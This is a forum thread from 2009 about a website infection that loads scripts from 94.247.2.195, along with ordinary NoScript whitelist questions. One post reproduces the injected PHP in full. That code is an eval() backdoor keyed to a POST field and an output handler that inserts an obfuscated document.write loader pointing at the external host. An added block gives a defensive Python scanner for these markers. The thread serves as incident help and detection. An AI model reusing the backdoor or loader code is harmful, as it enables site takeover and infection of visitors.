
Re: 94.247.2.195

Posted: Sun Apr 26, 2009 5:55 pm
by informactive
I did what you suggested and everything appears to be working OK.

Another question.

NoScript, options, white list.

Would it be a good idea, or can't hurt, to go through the list every so often to remove sites I might never go back and visit?

And the reason being just to clean up the list a bit.

Or sites I haven't been to in, say, some predetermined time are automatically deleted or their text turns red.

thanks

Re: 94.247.2.195

Posted: Sun Apr 26, 2009 6:25 pm
by Alan Baxter
informactive wrote: Would it be a good idea, or can't hurt, to go through the list every so often to remove sites I might never go back and visit?
It's not necessary but can't hurt. I do that occasionally during my OCD moments. Sometimes I accidentally remove a needed third-party helper site, but it's easily whitelisted again when it's needed.

Re: 94.247.2.195

Posted: Sun Apr 26, 2009 6:56 pm
by informactive
OK.

It would be nice if NoScript knew when I was going to have an OCD moment and did it for me with a single check box; however, I'll do it in my OCD moments.

Re: 94.247.2.195

Posted: Sun Apr 26, 2009 11:39 pm
by GµårÐïåñ
Well, it seems like I missed all the action on this one, go figure, but it seems you resolved it and it was already suggested that you got injected. So good luck, and now maybe I will get the follow-up posts.

Re: 94.247.2.195

Posted: Tue Apr 28, 2009 11:19 am
by petricamoise
I also have my forum infected: http://wisebets.org .
I got some help from my hosting company, and they found the code in the following files:

Code:

config.php:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdPWFElM0NzSXB2Y3J6WUZpcHpZRnQlMjBzcjZ2R2MlM0QlMkYlMkY5NCUyRTI0ellGNyUyRW1zbzJJcHYlMkUxOTVuMyUyRk9YUWpJcHZxdWVyeSUyRWpzbXNvJTNFJTNDNnZHJTJGc0lwdmNyaXB0bGklM0UnKS5yZXBsYWNlKC9saXxhUXw2dkd8ellGfE9YUXxtc298RGZ8bjN8SXB2L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

index.php:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdPWFElM0NzSXB2Y3J6WUZpcHpZRnQlMjBzcjZ2R2MlM0QlMkYlMkY5NCUyRTI0ellGNyUyRW1zbzJJcHYlMkUxOTVuMyUyRk9YUWpJcHZxdWVyeSUyRWpzbXNvJTNFJTNDNnZHJTJGc0lwdmNyaXB0bGklM0UnKS5yZXBsYWNlKC9saXxhUXw2dkd8ellGfE9YUXxtc298RGZ8bjN8SXB2L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

postinfo.html:

document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,""));
_vti_inf.html:

document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,""));

Also I found the following code in almost all my files:

Code:

<script language=javascript><!-- document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,"")); -->
I removed it manually from all I could find, and now the forum is working fine except the posting part. When I try to post on the forum it's getting slow and tries to connect to 94.247.2.195 (before I removed the code it was trying to connect to this IP from any page). But I already searched for the code in ALL files (manually) and couldn't find it anymore, even if it's still there.

Any ideas where it may be?
Also, does anyone have a suggestion of how to protect against it so that it won't happen again?

Thanks in advance.
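
A defender-side scanner for the injection described in this post, as an added example (not code from the forum, from NoScript, or from the poster): it walks a web root for the three markers visible in the snippets above (the eval() of the POST field, the ob_start() output handler that re-inserts the script into every response, and the document.write loader) and replays the loader's own unescape-then-replace step to reveal the URL it points at. Indicator strings are taken from the posted code; the sample files are constructed and shortened.

```python
import os
import re
from urllib.parse import unquote

# Indicators taken from the injected PHP and JS posted in this thread.
PHP_BACKDOOR = re.compile(r"eval\(\$_POST\['tmp_lkojfghx3'\]\)")
PHP_FILTER = re.compile(r"ob_start\('tmp_lkojfghx'\)")
JS_LOADER = re.compile(
    r"document\.write\(unescape\('([^']+)'\)\.replace\(/([^/]+)/g,\s*\"\"\)\)")

def decode_loader(escaped, junk_alternation):
    """Replay the loader's own decode: unescape, then drop the junk tokens as /a|b/g does."""
    return re.sub(junk_alternation, "", unquote(escaped))

def scan_text(path, text):
    """Return (path, kind, detail) findings for one file's contents."""
    findings = []
    if PHP_BACKDOOR.search(text):
        findings.append((path, "php-backdoor", "eval() of POST field tmp_lkojfghx3"))
    if PHP_FILTER.search(text):
        # The output handler re-inserts the <script> before <body> on every response.
        findings.append((path, "php-output-filter", "tmp_lkojfghx output handler"))
    for m in JS_LOADER.finditer(text):
        findings.append((path, "js-loader", decode_loader(m.group(1), m.group(2))))
    return findings

def scan_files(files):
    """files: {path: contents}. Returns all findings in path order."""
    return [f for path in sorted(files) for f in scan_text(path, files[path])]

def scan_tree(root):
    """Scan a real web root; latin-1 keeps binary files from raising."""
    files = {}
    for d, _, names in os.walk(root):
        for n in names:
            p = os.path.join(d, n)
            with open(p, encoding="latin-1") as fh:
                files[p] = fh.read()
    return scan_files(files)

# Constructed sample tree: shortened copies of the snippets posted above.
SAMPLE_FILES = {
    "config.php": "<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))"
                  "eval($_POST['tmp_lkojfghx3']); /* ... */ ob_start('tmp_lkojfghx'); } ?>",
    "postinfo.html": "document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2"
                     "Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E')"
                     ".replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,\"\"));",
    "clean.html": "<html><body>Hello</body></html>",
}
```

Because the PHP handler rewrites pages at response time, a clean static HTML tree can still serve the script; run scan_tree() over every PHP file the web server can include, not only the HTML.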

Re: 94.247.2.195

Posted: Tue Apr 28, 2009 1:49 pm
by therube
Again. First you have to determine if it is your website or host that is (initially) being exploited.
The .php - who is responsible for that? You or your host. If you, fix it. If your hosting company, have them fix it.

noscript, 94.247.2.195 and malwarebytes

Has my website been hacked?

Re: 94.247.2.195

Posted: Tue Apr 28, 2009 10:27 pm
by GµårÐïåñ
There might be an import reference to an external file; check all your imports and links to external JS in the documents.